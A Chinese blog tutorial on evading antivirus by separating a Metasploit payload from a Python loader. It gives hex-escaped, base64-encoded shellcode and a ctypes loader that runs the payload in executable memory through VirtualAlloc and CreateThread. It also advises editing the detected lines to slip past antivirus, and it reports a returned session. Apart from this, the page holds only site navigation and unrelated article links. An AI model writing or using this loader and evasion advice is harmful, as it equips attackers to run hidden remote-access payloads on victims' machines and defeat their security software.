首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

通过Python实现Payload分离免杀过程详解

Posted in Python onJuly 13, 2020

缺点:

编译成exe以后体积过大

实现:

msf生成shellcode代码:

通过Python实现Payload分离免杀过程详解

将payload给copy下来,去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42
\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66
\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53
\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a
\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30
\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f
\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44
\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51
\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34
\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59
\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72
\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a
\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c
\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67
\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38
\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42
\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a
\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31
\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e
\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c
\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a
\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61
\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57
\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67
\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46
\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62
\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46
\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d
\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67
\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64
 
encode_shellcode = "shell_code"
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。

返回session:

通过Python实现Payload分离免杀过程详解

免杀效果:

通过Python实现Payload分离免杀过程详解

参考资料:

https://github.com/TideSec/BypassAntiVirus

https://micro8.gitbook.io/micro8/

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

通过Python实现Payload分离免杀过程详解

- Author -

返回主页aptkekeo

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
Python中使用copy模块实现列表(list)拷贝
Apr 14 Python
Python读取sqlite数据库文件的方法分析
Aug 07 Python
SVM基本概念及Python实现代码
Dec 27 Python
python实现用户管理系统
Jan 10 Python
Python中实现变量赋值传递时的引用和拷贝方法
Apr 29 Python
python中yield的用法详解——最简单,最清晰的解释
Apr 04 Python
python实现Excel文件转换为TXT文件
Apr 28 Python
Django打印出在数据库中执行的语句问题
Jul 25 Python
python global关键字的用法详解
Sep 05 Python
Python TCPServer 多线程多客户端通信的实现
Dec 31 Python
PyTorch和Keras计算模型参数的例子
Jan 02 Python
Python 解码Base64 得到码流格式文本实例
Jan 09 Python
python上selenium的弹框操作实现
Jul 13 #Python
python如何导入依赖包
Jul 13 #Python
python入门:argparse浅析 nargs='+'作用
Jul 12 #Python
浅谈Python 命令行参数argparse写入图片路径操作
Jul 12 #Python
Python实现封装打包自己写的代码,被python import
Jul 12 #Python
Django封装交互接口代码
Jul 12 #Python
在django中实现choices字段获取对应字段值
Jul 12 #Python
iOS15(1) 模糊匹配(1) compose(3) opencv(7) FuzzyWuzzy(1) iOS16(1) iOS(1) Athens(1) moviepy(1) Pyecharts(7)
You might like
php实现在线生成条形码示例分享(条形码生成器)
2013/12/30 PHP
Alliance vs AM BO3 第一场2.13
2021/03/10 DOTA
快速解决FusionCharts联动的中文乱码问题
2013/12/04 Javascript
js toFixed()方法的重写实现精度的统一
2014/03/06 Javascript
js检测判断日期大于多少天的方法
2015/05/04 Javascript
javascript实现表格增删改操作实例详解
2015/05/15 Javascript
JS打字效果的动态菜单代码分享
2015/08/21 Javascript
基于Jquery实现仿百度百科右侧导航代码附源码下载
2015/11/27 Javascript
JS正则表达式比较常见用法
2016/01/26 Javascript
javascript冒泡排序小结
2016/04/10 Javascript
在windows上用nodejs搭建静态文件服务器的简单方法
2016/08/11 NodeJs
JavaScript递归函数解“汉诺塔”算法代码解析
2018/07/05 Javascript
JQuery省市联动效果实现过程详解
2020/05/08 jQuery
js实现跳一跳小游戏
2020/07/31 Javascript
js绘制一条直线并旋转45度
2020/08/21 Javascript
[01:03:36]Ti4 循环赛第三日DK vs Titan
2014/07/12 DOTA
Python 开发Activex组件方法
2009/11/08 Python
详解Python中time()方法的使用的教程
2015/05/22 Python
Python字符串和字典相关操作的实例详解
2017/09/23 Python
使用python为mysql实现restful接口
2018/01/05 Python
Python 隐藏输入密码时屏幕回显的实例
2019/02/19 Python
python pandas移动窗口函数rolling的用法
2020/02/29 Python
python实现手势识别的示例(入门)
2020/04/15 Python
PythonPC客户端自动化实现原理(pywinauto)
2020/05/28 Python
python3判断IP地址的方法
2021/03/04 Python
html5中JavaScript removeChild 删除所有节点
2014/05/16 HTML / CSS
html5是什么_动力节点Java学院整理
2017/07/07 HTML / CSS
英国领先的独立时装店:Van Mildert
2019/10/28 全球购物
旅游饭店管理专业自荐书
2014/06/28 职场文书
工地例会施工汇报材料
2014/08/22 职场文书
党员自我剖析材料
2014/08/31 职场文书
幼儿教师师德师风自我剖析材料
2014/09/29 职场文书
中小学生安全教育观后感
2015/06/17 职场文书
Python实现简繁体转换
2021/06/07 Python
Python中的嵌套循环详情
2022/03/23 Python
vue-cli3.x配置全局的scss的时候报错问题及解决
2022/04/30 Vue.js